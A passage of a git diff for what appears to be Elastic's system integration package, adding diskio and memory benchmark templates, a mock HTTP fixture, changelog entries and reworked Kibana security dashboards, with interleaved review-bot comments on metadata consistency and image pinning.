+ "ephemeral_id": "22ed892c-43bd-408a-9121-65e2f5b6a56e",
+ "id": "de42127b-4db8-4471-824e-a7b14f478663",
+ "name": "system-scale-123456",
+ "type": "metricbeat",
+ "version": "8.8.0"
+ },
+ "data_stream": {
+ "dataset": "system.diskio",
+ "namespace": "ep",
+ "type": "metrics"
+ },
+ "ecs": {
+ "version": "8.0.0"
+ },
+ "elastic_agent": {
+ "id": "de42127b-4db8-4471-824e-a7b14f478663",
+ "snapshot": false,
+ "version": "8.12.1"
+ },
+ "event": {
+ "agent_id_status": "verified",
+ "dataset": "system.diskio",
+ "duration": {{ $event_duration }},
+ "module": "system"
+ },
+ "host": {
+ "architecture": "x86_64",
+ "containerized": true,
+ "hostname": "docker-fleet-agent",
+ "id": "96bd755dd266474fb86bd80a98cbaad5",
+ "ip": "192.168.253.7",
+ "mac": "02-42-C0-A8-FD-07",
+ "name": "docker-fleet-agent",
+ "os": {
+ "codename": "focal",
+ "family": "debian",
+ "kernel": "3.10.0-1160.105.1.el7.x86_64",
+ "name": "Ubuntu",
+ "platform": "ubuntu",
+ "type": "linux",
+ "version": "20.04.6 LTS (Focal Fossa)"
+ }
+ },
+ "metricset": {
+ "name": "diskio",
+ "period": 10000
+ },
+ "service": {
+ "type": "system"
+ },
+ "system": {
+ "diskio": {
+ "io": {
+ "ops": {{ $system_diskio_io_ops }},
+ "time": {{ $system_diskio_io_time }}
+ },
+ "name": "{{ $system_diskio_name }}",
+ {{- if eq $system_diskio_name "sda"}}
+ "serial_number": "SN20240308001",
+ {{- else if eq $system_diskio_name "sda1"}}
+ "serial_number": "SN20240308002",
+ {{- else if eq $system_diskio_name "sda2"}}
+ "serial_number": "SN20240308003",
+ {{- else if eq $system_diskio_name "dm-0"}}
+ "serial_number": "SN20240308004",
+ {{- else }}
+ "serial_number": "SN20240308005",
+ {{- end }}
+ "read": {
+ "bytes": {{ $system_diskio_read_bytes }},
+ "count": {{ $system_diskio_read_count }},
+ "time": {{ $system_diskio_read_time }}
+ },
+ "write": {
+ "bytes": {{ $system_diskio_write_bytes }},
+ "count": {{ $system_diskio_write_count }},
+ "time": {{ $system_diskio_write_time }}
+ }
+ }
+ }
+}
\ No newline at end of file
diff --git a/packages/system/_dev/benchmark/rally/memory-benchmark.yml b/packages/system/_dev/benchmark/rally/memory-benchmark.yml
new file mode 100644
index 00000000000..436e1679ace
--- /dev/null
+++ b/packages/system/_dev/benchmark/rally/memory-benchmark.yml
@@ -0,0 +1,14 @@
+---
+description: Benchmark 20000 system.memory events ingested
+data_stream:
+ name: memory
+corpora:
+ generator:
+ total_events: 20000
+ template:
+ type: gotext
+ path: ./memory-benchmark/template.ndjson
+ config:
+ path: ./memory-benchmark/config.yml
+ fields:
+ path: ./memory-benchmark/fields.yml
diff --git a/packages/system/_dev/benchmark/rally/memory-benchmark/config.yml b/packages/system/_dev/benchmark/rally/memory-benchmark/config.yml
new file mode 100644
index 00000000000..c7b780eec7a
--- /dev/null
+++ b/packages/system/_dev/benchmark/rally/memory-benchmark/config.yml
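Review bot: The generated documents carry inconsistent agent metadata: in this template `agent.version` is `"8.8.0"` while `elastic_agent.version` is `"8.12.1"`, and memory-benchmark/template.ndjson additionally uses an `elastic_agent.id` (`404fc805-…`) that differs from its `agent.id` (`de42127b-…`). Real Agent output presumably reports the same id and version in both objects, so a benchmark that groups or filters on these fields would see phantom extra agents; aligning the constants (e.g. `"version": "8.12.1"` under `agent`) keeps the corpus realistic. Since every host and agent identifier here is a fixed literal, a one-line comment at the top of the template stating that these identifiers are constant across all 20000 events would help readers interpret cardinality results.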
@@ -0,0 +1,35 @@
+fields:
+ - name: timestamp
+ period: -60m
+ - name: event_duration
+ range:
+ min: 0
+ max: 100000
+ - name: system_memory_used_bytes
+ range:
+ min: 8000000000
+ max: 9000000000
+ - name: system_memory_cached
+ range:
+ min: 1000000000
+ max: 2000000000
+ - name: system_memory_free
+ range:
+ min: 2000000000
+ max: 3000000000
+ - name: system_memory_actual_used_bytes
+ range:
+ min: 5000000000
+ max: 7000000000
+ - name: system_memory_actual_free
+ range:
+ min: 3000000000
+ max: 5000000000
+ - name: system_memory_swap_used_bytes
+ range:
+ min: 300000000
+ max: 500000000
+ - name: system_memory_swap_free
+ range:
+ min: 3000000000
+ max: 4000000000
diff --git a/packages/system/_dev/benchmark/rally/memory-benchmark/fields.yml b/packages/system/_dev/benchmark/rally/memory-benchmark/fields.yml
new file mode 100644
index 00000000000..709f320544a
--- /dev/null
+++ b/packages/system/_dev/benchmark/rally/memory-benchmark/fields.yml
@@ -0,0 +1,18 @@
+- name: timestamp
+ type: date
+- name: event_duration
+ type: long
+- name: system_memory_used_bytes
+ type: long
+- name: system_memory_free
+ type: long
+- name: system_memory_cached
+ type: long
+- name: system_memory_actual_used_bytes
+ type: long
+- name: system_memory_actual_free
+ type: long
+- name: system_memory_swap_used_bytes
+ type: long
+- name: system_memory_swap_free
+ type: long
diff --git a/packages/system/_dev/benchmark/rally/memory-benchmark/template.ndjson b/packages/system/_dev/benchmark/rally/memory-benchmark/template.ndjson
new file mode 100644
index 00000000000..3292d96d6a3
--- /dev/null
+++ b/packages/system/_dev/benchmark/rally/memory-benchmark/template.ndjson
@@ -0,0 +1,94 @@
+{{- $event_duration := generate "event_duration" }}
+{{- $timestamp := generate "timestamp" }}
+{{- $system_memory_used_bytes := generate "system_memory_used_bytes" }}
+{{- $system_memory_free := generate "system_memory_free" }}
+{{- $system_memory_cached := generate "system_memory_cached" }}
+{{- $system_memory_actual_used_bytes := generate "system_memory_actual_used_bytes" }}
+{{- $system_memory_actual_free := generate "system_memory_actual_free" }}
+{{- $system_memory_actual_sum := add $system_memory_actual_used_bytes $system_memory_actual_free }}
+{{- $system_memory_swap_used_bytes := generate "system_memory_swap_used_bytes" }}
+{{- $system_memory_swap_free := generate "system_memory_swap_free" }}
+{{- $system_memory_swap_total := add $system_memory_swap_free $system_memory_swap_used_bytes }}
+{{- $system_memory_swap_used_pct := divf $system_memory_swap_used_bytes $system_memory_swap_total }}
+{{- $system_memory_total := add $system_memory_used_bytes $system_memory_free }}
+{{- $system_memory_used_pct := divf $system_memory_used_bytes $system_memory_total }}
+{
+ "@timestamp": "{{ $timestamp.Format "2006-01-02T15:04:05.000Z07:00" }}",
+ "agent": {
+ "ephemeral_id": "22ed892c-43bd-408a-9121-65e2f5b6a56e",
+ "id": "de42127b-4db8-4471-824e-a7b14f478663",
+ "name": "system-scale-123456",
+ "type": "metricbeat",
+ "version": "8.8.0"
+ },
+ "data_stream": {
+ "dataset": "system.memory",
+ "namespace": "ep",
+ "type": "metrics"
+ },
+ "ecs": {
+ "version": "8.0.0"
+ },
+ "elastic_agent": {
+ "id": "404fc805-04b8-420a-9fcf-12d54b89d4fd",
+ "snapshot": false,
+ "version": "8.12.1"
+ },
+ "event": {
+ "agent_id_status": "verified",
+ "dataset": "system.memory",
+ "duration": {{ $event_duration }},
+ "module": "system"
+ },
+ "host": {
+ "architecture": "x86_64",
+ "containerized": true,
+ "hostname": "docker-fleet-agent",
+ "id": "96bd755dd266474fb86bd80a98cbaad5",
+ "ip": "192.168.241.7",
+ "mac": "02-42-C0-A8-F1-07",
+ "name": "docker-fleet-agent",
+ "os": {
+ "codename": "focal",
+ "family": "debian",
+ "kernel": "3.10.0-1160.105.1.el7.x86_64",
+ "name": "Ubuntu",
+ "platform": "ubuntu",
+ "type": "linux",
+ "version": "20.04.6 LTS (Focal Fossa)"
+ }
+ },
+ "metricset": {
+ "name": "memory",
+ "period": 10000
+ },
+ "service": {
+ "type": "system"
+ },
+ "system": {
+ "memory": {
+ "actual": {
+ "free": {{ $system_memory_actual_free }},
+ "used": {
+ "bytes": {{ $system_memory_actual_used_bytes }},
+ "pct": {{ divf $system_memory_actual_used_bytes $system_memory_actual_sum }}
+ }
+ },
+ "cached": {{ $system_memory_cached }},
+ "free": {{ $system_memory_free }},
+ "swap": {
+ "free": {{ $system_memory_swap_free }},
+ "total": {{ $system_memory_swap_total }},
+ "used": {
+ "bytes": {{ $system_memory_swap_used_bytes }},
+ "pct": {{ $system_memory_swap_used_pct }}
+ }
+ },
+ "total": {{ $system_memory_total }},
+ "used": {
+ "bytes": {{ $system_memory_used_bytes }},
+ "pct": {{ $system_memory_used_pct }}
+ }
+ }
+ }
+}
\ No newline at end of file
diff --git a/packages/system/_dev/deploy/docker/docker-compose.yml b/packages/system/_dev/deploy/docker/docker-compose.yml
index 316d3a9573e..39884915814 100644
--- a/packages/system/_dev/deploy/docker/docker-compose.yml
+++ b/packages/system/_dev/deploy/docker/docker-compose.yml
@@ -11,17 +11,15 @@ services:
 - ${SERVICE_LOGS_DIR}:/var/log
 command: /bin/sh -c "cp /sample_logs/*.log /var/log/"
 security:
- image: docker.elastic.co/observability/stream:v0.4.0
+ image: docker.elastic.co/observability/stream:v0.14.0
+ volumes:
+ - ./files:/files:ro
 ports:
 - 8080
- volumes:
- - ./sample_logs:/sample_logs:ro
 command:
- - log
- - --start-signal=SIGHUP
+ - http-server
 - --addr=:8080
- - -p=http-server
- - /sample_logs/security.json.log
+ - --config=/files/security.stream.yml
 syslog:
 image: alpine
 volumes:
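Review bot: The bumped `security` service image is still pinned by mutable tag only (`image: docker.elastic.co/observability/stream:v0.14.0`); now that the fixture's response is produced at request time by a config-driven server rather than replayed from a static log file, pinning by digest, `image: docker.elastic.co/observability/stream:v0.14.0@sha256:<digest-placeholder>`, would keep the system test reproducible if the tag is ever re-pushed. A one-line comment above the service would also save the next reader a trip through git history: `# stream in http-server mode serves files/security.stream.yml; the former log mode (and its SIGHUP start signal) is gone, so the test config no longer sets service_notify_signal.` The `syslog` service's untagged `image: alpine` is outside this change but has the same reproducibility issue.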
diff --git a/packages/system/_dev/deploy/docker/files/security.stream.yml b/packages/system/_dev/deploy/docker/files/security.stream.yml
new file mode 100644
index 00000000000..203c6b6e3a6
--- /dev/null
+++ b/packages/system/_dev/deploy/docker/files/security.stream.yml
@@ -0,0 +1,33 @@
+rules:
+ - path: "/api/v1/logs/services/search/jobs/export"
+ methods: ["POST"]
+ responses:
+ - status_code: 200
+ body: |-
+ {{ minify_json `
+ {
+ "lastrow": true,
+ "offset": 194,
+ "preview": false,
+ "result": {
+ "_bkt": "main~0~1212176D-89E1-485D-89E6-3ADC276CCA38",
+ "_cd": "0:315",
+ "_indextime": "1622471463",
+ "_raw": "11000410300x402000000000000014257SecurityWIN-41OB2LO92CR.wlbeat.local",
+ "_serial": "194",
+ "_si": [
+ "69819b6ce1bd",
+ "main"
+ ],
+ "_sourcetype": "XmlWinEventLog:Security",
+ "_time": "2021-05-25 13:11:45.000 UTC",
+ "host": "VAGRANT",
+ "index": "main",
+ "linecount": "1",
+ "max_indextime": "1622471606",
+ "source": "WinEventLog:Security",
+ "sourcetype": "XmlWinEventLog:Security",
+ "splunk_server": "69819b6ce1bd"
+ }
+ }
+ `}}
diff --git a/packages/system/_dev/deploy/docker/sample_logs/security.json.log b/packages/system/_dev/deploy/docker/sample_logs/security.json.log
deleted file mode 100644
index 88e56a76d78..00000000000
--- a/packages/system/_dev/deploy/docker/sample_logs/security.json.log
+++ /dev/null
@@ -1 +0,0 @@
-{"preview": false,"offset": 194,"lastrow": true,"result": {"_bkt": "main~0~1212176D-89E1-485D-89E6-3ADC276CCA38","_cd": "0:315","_indextime": "1622471463","_raw": "11000410300x402000000000000014257SecurityWIN-41OB2LO92CR.wlbeat.local","_serial": "194","_si": ["69819b6ce1bd","main"],"_sourcetype": "XmlWinEventLog:Security","_time": "2021-05-25 13:11:45.000 UTC","host": "VAGRANT","index": "main","linecount": "1","max_indextime": "1622471606","source": "WinEventLog:Security","sourcetype": "XmlWinEventLog:Security","splunk_server": "69819b6ce1bd"}}
\ No newline at end of file
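Review bot: The new rule file does not say what it stands in for, and the single rule answers every `POST` to the path with the same 200 body regardless of request headers or credentials (the system test in data_stream/security/_dev/test/system/test-default-config.yml sends `username: test`), which is fine for a fixture but worth stating so nobody mistakes it for an authenticating mock. Suggest a header line `# Fixture for the security data stream system test: one canned Splunk-style export result; minify_json folds the readable JSON below into the single-line body the httpjson input reads.` The `_raw` value is carried over byte-for-byte from the deleted sample_logs/security.json.log, so any oddity in it predates this change.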
diff --git a/packages/system/changelog.yml b/packages/system/changelog.yml
index b0fe40e874d..b8404a43f70 100644
--- a/packages/system/changelog.yml
+++ b/packages/system/changelog.yml
@@ -1,4 +1,14 @@
 # newer versions go on top
+- version: "1.54.0"
+ changes:
+ - description: Enable 'secret' for the sensitive fields.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9009
+- version: "1.53.1"
+ changes:
+ - description: Inline "by reference" visualizations
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9053
 - version: "1.53.0"
 changes:
 - description: Enable TSDB by default for core datastream. This improves storage usage and query performance. For more details, see https://www.elastic.co/guide/en/elasticsearch/reference/current/tsds.html
diff --git a/packages/system/data_stream/security/_dev/test/system/test-default-config.yml b/packages/system/data_stream/security/_dev/test/system/test-default-config.yml
index 53e0095b607..ef355c51989 100644
--- a/packages/system/data_stream/security/_dev/test/system/test-default-config.yml
+++ b/packages/system/data_stream/security/_dev/test/system/test-default-config.yml
@@ -1,6 +1,5 @@
 input: httpjson
 service: security
-service_notify_signal: SIGHUP
 vars:
 url: http://{{Hostname}}:{{Port}}/api/v1/logs
 username: test
diff --git a/packages/system/kibana/dashboard/system-0d3f2380-fa78-11e6-ae9b-81e5311e8cab.json b/packages/system/kibana/dashboard/system-0d3f2380-fa78-11e6-ae9b-81e5311e8cab.json
index 6a4deaa1dee..4280e6bf5ef 100644
--- a/packages/system/kibana/dashboard/system-0d3f2380-fa78-11e6-ae9b-81e5311e8cab.json
+++ b/packages/system/kibana/dashboard/system-0d3f2380-fa78-11e6-ae9b-81e5311e8cab.json
@@ -1,4 +1,15 @@ { + "id": "system-0d3f2380-fa78-11e6-ae9b-81e5311e8cab", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-01-22T13:28:13.685Z", + "created_at": "2024-01-22T13:28:13.685Z", + "version": "WzEyMiwxXQ==", "attributes": { "description": "New users and groups dashboard for the System integration in Logs", "kibanaSavedObjectMeta": { @@ -1179,10 +1190,6 @@ "title": "[Logs System] New users and groups", "version": 1 }, - "coreMigrationVersion": "8.8.0", - "created_at": "2023-10-09T20:43:01.854Z", - "id": "system-0d3f2380-fa78-11e6-ae9b-81e5311e8cab", - "managed": false, "references": [ { "id": "logs-*", @@ -1220,6 +1227,7 @@ "type": "index-pattern" } ], - "type": "dashboard", + "managed": false, + "coreMigrationVersion": "8.8.0", "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/system/kibana/dashboard/system-277876d0-fa2c-11e6-bbd3-29c986c96e5a.json b/packages/system/kibana/dashboard/system-277876d0-fa2c-11e6-bbd3-29c986c96e5a.json index fcc6d9c6b42..fa237a08011 100644 --- a/packages/system/kibana/dashboard/system-277876d0-fa2c-11e6-bbd3-29c986c96e5a.json +++ b/packages/system/kibana/dashboard/system-277876d0-fa2c-11e6-bbd3-29c986c96e5a.json @@ -1,4 +1,15 @@ { + "id": "system-277876d0-fa2c-11e6-bbd3-29c986c96e5a", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-01-22T13:28:13.685Z", + "created_at": "2024-01-22T13:28:13.685Z", + "version": "WzEyMywxXQ==", "attributes": { "description": "Sudo commands dashboard from the Logs System integration", "kibanaSavedObjectMeta": { @@ -641,10 +652,6 @@ "title": "[Logs System] Sudo commands", "version": 1 }, - "coreMigrationVersion": "8.8.0", - "created_at": "2023-10-09T20:43:31.398Z", - "id": "system-277876d0-fa2c-11e6-bbd3-29c986c96e5a", - "managed": false, "references": [ { "id": "logs-*", 
@@ -677,6 +684,7 @@ "type": "index-pattern" } ], - "type": "dashboard", + "managed": false, + "coreMigrationVersion": "8.8.0", "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/system/kibana/dashboard/system-5517a150-f9ce-11e6-8115-a7c18106d86a.json b/packages/system/kibana/dashboard/system-5517a150-f9ce-11e6-8115-a7c18106d86a.json index a546f5f4b3e..01288c4ace0 100644 --- a/packages/system/kibana/dashboard/system-5517a150-f9ce-11e6-8115-a7c18106d86a.json +++ b/packages/system/kibana/dashboard/system-5517a150-f9ce-11e6-8115-a7c18106d86a.json @@ -1,4 +1,15 @@ { + "id": "system-5517a150-f9ce-11e6-8115-a7c18106d86a", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-01-22T13:28:13.685Z", + "created_at": "2024-01-22T13:28:13.685Z", + "version": "WzEyNCwxXQ==", "attributes": { "description": "SSH dashboard for the System integration in Logs", "kibanaSavedObjectMeta": { @@ -732,10 +743,6 @@ "title": "[Logs System] SSH login attempts", "version": 1 }, - "coreMigrationVersion": "8.8.0", - "created_at": "2023-10-09T20:44:09.120Z", - "id": "system-5517a150-f9ce-11e6-8115-a7c18106d86a", - "managed": false, "references": [ { "id": "logs-*", @@ -778,6 +785,7 @@ "type": "index-pattern" } ], - "type": "dashboard", + "managed": false, + "coreMigrationVersion": "8.8.0", "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/system/kibana/dashboard/system-71f720f0-ff18-11e9-8405-516218e3d268.json b/packages/system/kibana/dashboard/system-71f720f0-ff18-11e9-8405-516218e3d268.json index c024ef02fc5..aeb096c6b2a 100644 --- a/packages/system/kibana/dashboard/system-71f720f0-ff18-11e9-8405-516218e3d268.json +++ b/packages/system/kibana/dashboard/system-71f720f0-ff18-11e9-8405-516218e3d268.json 
@@ -1,4 +1,15 @@ { + "id": "system-71f720f0-ff18-11e9-8405-516218e3d268", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-01-22T13:28:13.685Z", + "created_at": "2024-01-22T13:28:13.685Z", + "version": "WzEyNSwxXQ==", "attributes": { "description": "User management activity.", "kibanaSavedObjectMeta": { @@ -81,6 +92,16 @@ }, "panelsJSON": [ { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 8, + "i": "1", + "w": 17, + "x": 0, + "y": 0 + }, + "panelIndex": "1", "embeddableConfig": { "enhancements": {}, "savedVis": { @@ -103,21 +124,22 @@ "title": "User Management Events - Description [Windows System Security]", "type": "markdown", "uiState": {} - } + }, + "type": "visualization" }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { - "h": 8, - "i": "1", - "w": 17, + "h": 16, + "i": "3", + "w": 9, "x": 0, - "y": 0 + "y": 56 }, - "panelIndex": "1", - "title": "", - "type": "visualization", - "version": "8.7.0" - }, - { + "panelIndex": "3", "embeddableConfig": { "attributes": { "references": [ @@ -310,21 +332,22 @@ "visualizationType": "lnsDatatable" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "Users Created - Table [Windows System Security]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 16, - "i": "3", + "i": "5", "w": 9, - "x": 0, + "x": 9, "y": 56 }, - "panelIndex": "3", - "title": "Users Created - Table [Windows System Security]", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "5", "embeddableConfig": { "attributes": { "references": [ 
@@ -517,21 +540,22 @@ "visualizationType": "lnsDatatable" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "Users Enabled - Table [Windows System Security]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 16, - "i": "5", + "i": "6", "w": 9, - "x": 9, - "y": 56 + "x": 0, + "y": 79 }, - "panelIndex": "5", - "title": "Users Enabled - Table [Windows System Security]", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "6", "embeddableConfig": { "attributes": { "references": [ @@ -724,21 +748,22 @@ "visualizationType": "lnsDatatable" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "Users Disabled - Table [Windows System Security]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 16, - "i": "6", + "i": "7", "w": 9, - "x": 0, - "y": 79 + "x": 18, + "y": 56 }, - "panelIndex": "6", - "title": "Users Disabled - Table [Windows System Security]", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "7", "embeddableConfig": { "attributes": { "references": [ @@ -931,21 +956,22 @@ "visualizationType": "lnsDatatable" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "Users Deleted - Table [Windows System Security]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 16, - "i": "7", + "i": "9", "w": 9, "x": 18, - "y": 56 + "y": 79 }, - "panelIndex": "7", - "title": "Users Deleted - Table [Windows System Security]", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "9", "embeddableConfig": { "attributes": { "references": [ 
@@ -1148,21 +1174,22 @@ "visualizationType": "lnsDatatable" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "Users Password Changes - Table [Windows System Security]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 16, - "i": "9", + "i": "15", "w": 9, - "x": 18, + "x": 9, "y": 79 }, - "panelIndex": "9", - "title": "Users Password Changes - Table [Windows System Security]", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "15", "embeddableConfig": { "attributes": { "references": [ @@ -1355,21 +1382,22 @@ "visualizationType": "lnsDatatable" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "Unlocked Users - Table [Windows System Security]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 16, - "i": "15", + "i": "16", "w": 9, - "x": 9, - "y": 79 + "x": 18, + "y": 102 }, - "panelIndex": "15", - "title": "Unlocked Users - Table [Windows System Security]", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "16", "embeddableConfig": { "attributes": { "references": [ @@ -1562,21 +1590,22 @@ "visualizationType": "lnsDatatable" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "Users Changes Table [Windows System Security]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 16, - "i": "16", + "i": "20", "w": 9, - "x": 18, + "x": 0, "y": 102 }, - "panelIndex": "16", - "title": "Users Changes Table [Windows System Security]", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "20", "embeddableConfig": { "attributes": { "references": [ 
@@ -1769,23 +1798,48 @@ "visualizationType": "lnsDatatable" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, - "gridData": { - "h": 16, - "i": "20", - "w": 9, - "x": 0, - "y": 102 - }, - "panelIndex": "20", - "title": "Users Locked Out - Table [Windows System Security]", - "type": "lens", - "version": "8.7.0" + "title": "Users Locked Out - Table [Windows System Security]" }, { "embeddableConfig": { - "enhancements": {} + "enhancements": {}, + "attributes": { + "columns": [ + "user.name", + "source.domain", + "source.ip", + "winlog.logon.id", + "winlog.logon.type" + ], + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": "{\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\",\"key\":\"event.code\",\"negate\":false,\"params\":[\"4624\"],\"type\":\"phrases\",\"value\":\"4624\"},\"query\":{\"bool\":{\"minimum_should_match\":1,\"should\":[{\"match_phrase\":{\"event.code\":\"4624\"}}]}}}],\"highlightAll\":true,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"query\":{\"language\":\"kuery\",\"query\":\"data_stream.dataset:windows.security OR data_stream.dataset:system.security\"},\"version\":true}" + }, + "sort": [ + [ + "@timestamp", + "desc" + ] + ], + "title": "Logon Details [Windows System Security]", + "version": 1, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + } + ] + } }, "gridData": { "h": 46, 
@@ -1795,13 +1849,48 @@ "y": 72 }, "panelIndex": "22", - "panelRefName": "panel_22", "type": "search", - "version": "8.7.0" + "version": "8.0.0" }, { "embeddableConfig": { - "enhancements": {} + "enhancements": {}, + "attributes": { + "columns": [ + "event.action", + "winlog.event_data.TargetUserName", + "user.domain", + "user.name", + "winlog.event_data.SubjectDomainName", + "winlog.logon.id", + "related.user" + ], + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": "{\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\",\"key\":\"event.code\",\"negate\":false,\"params\":[\"4720\",\"4722\",\"4723\",\"4724\",\"4725\",\"4726\",\"4738\",\"4740\",\"4767\",\"4781\",\"4798\"],\"type\":\"phrases\",\"value\":\"4720, 4722, 4723, 4724, 4725, 4726, 4738, 4740, 4767, 4781, 4798\"},\"query\":{\"bool\":{\"minimum_should_match\":1,\"should\":[{\"match_phrase\":{\"event.code\":\"4720\"}},{\"match_phrase\":{\"event.code\":\"4722\"}},{\"match_phrase\":{\"event.code\":\"4723\"}},{\"match_phrase\":{\"event.code\":\"4724\"}},{\"match_phrase\":{\"event.code\":\"4725\"}},{\"match_phrase\":{\"event.code\":\"4726\"}},{\"match_phrase\":{\"event.code\":\"4738\"}},{\"match_phrase\":{\"event.code\":\"4740\"}},{\"match_phrase\":{\"event.code\":\"4767\"}},{\"match_phrase\":{\"event.code\":\"4781\"}},{\"match_phrase\":{\"event.code\":\"4798\"}}]}}}],\"highlightAll\":true,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"query\":{\"language\":\"kuery\",\"query\":\"data_stream.dataset:windows.security OR data_stream.dataset:system.security\"},\"version\":true}" + }, + "sort": [ + [ + "@timestamp", + "desc" + ] + ], + "title": "User management Details - Search [Windows System Security]", + "version": 1, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + }, 
+ { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + } + ] + } }, "gridData": { "h": 19, @@ -1811,11 +1900,20 @@ "y": 118 }, "panelIndex": "23", - "panelRefName": "panel_23", "type": "search", - "version": "8.7.0" + "version": "8.0.0" }, { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 16, + "i": "33", + "w": 9, + "x": 9, + "y": 102 + }, + "panelIndex": "33", "embeddableConfig": { "attributes": { "references": [ @@ -2008,21 +2106,22 @@ "visualizationType": "lnsDatatable" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, - "gridData": { - "h": 16, - "i": "33", - "w": 9, - "x": 9, - "y": 102 - }, - "panelIndex": "33", - "title": "Users Renamed - Table [Windows System Security]", - "type": "lens", - "version": "8.7.0" + "title": "Users Renamed - Table [Windows System Security]" }, { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 8, + "i": "cf0adfac-7cf2-479d-8ddb-1edeee62d37c", + "w": 31, + "x": 17, + "y": 0 + }, + "panelIndex": "cf0adfac-7cf2-479d-8ddb-1edeee62d37c", "embeddableConfig": { "enhancements": {}, "savedVis": { @@ -2045,21 +2144,22 @@ "title": "Dashboard links [Windows System Security]", "type": "markdown", "uiState": {} - } - }, - "gridData": { - "h": 8, - "i": "cf0adfac-7cf2-479d-8ddb-1edeee62d37c", - "w": 31, - "x": 17, - "y": 0 + }, + "type": "visualization" }, - "panelIndex": "cf0adfac-7cf2-479d-8ddb-1edeee62d37c", - "title": "", - "type": "visualization", - "version": "8.7.0" + "title": "" }, { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 16, + "i": "a2871661-98a8-489b-b615-e66ebe3b971a", + "w": 17, + "x": 0, + "y": 8 + }, + "panelIndex": "a2871661-98a8-489b-b615-e66ebe3b971a", "embeddableConfig": { "attributes": { "references": [ 
@@ -2261,21 +2361,22 @@ "visualizationType": "lnsPie" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "User Management Actions [Windows System Security]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 16, - "i": "a2871661-98a8-489b-b615-e66ebe3b971a", - "w": 17, - "x": 0, + "i": "dd3e12e6-0d3c-448e-b0c4-91f7dc8742b6", + "w": 13, + "x": 17, "y": 8 }, - "panelIndex": "a2871661-98a8-489b-b615-e66ebe3b971a", - "title": "User Management Actions [Windows System Security]", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "dd3e12e6-0d3c-448e-b0c4-91f7dc8742b6", "embeddableConfig": { "attributes": { "references": [ @@ -2501,21 +2602,22 @@ "visualizationType": "lnsDatatable" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "User Event Actions - Table [Windows System Security]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 16, - "i": "dd3e12e6-0d3c-448e-b0c4-91f7dc8742b6", - "w": 13, - "x": 17, + "i": "44697eb7-bb8e-4994-9e1b-95599f1b994a", + "w": 18, + "x": 30, "y": 8 }, - "panelIndex": 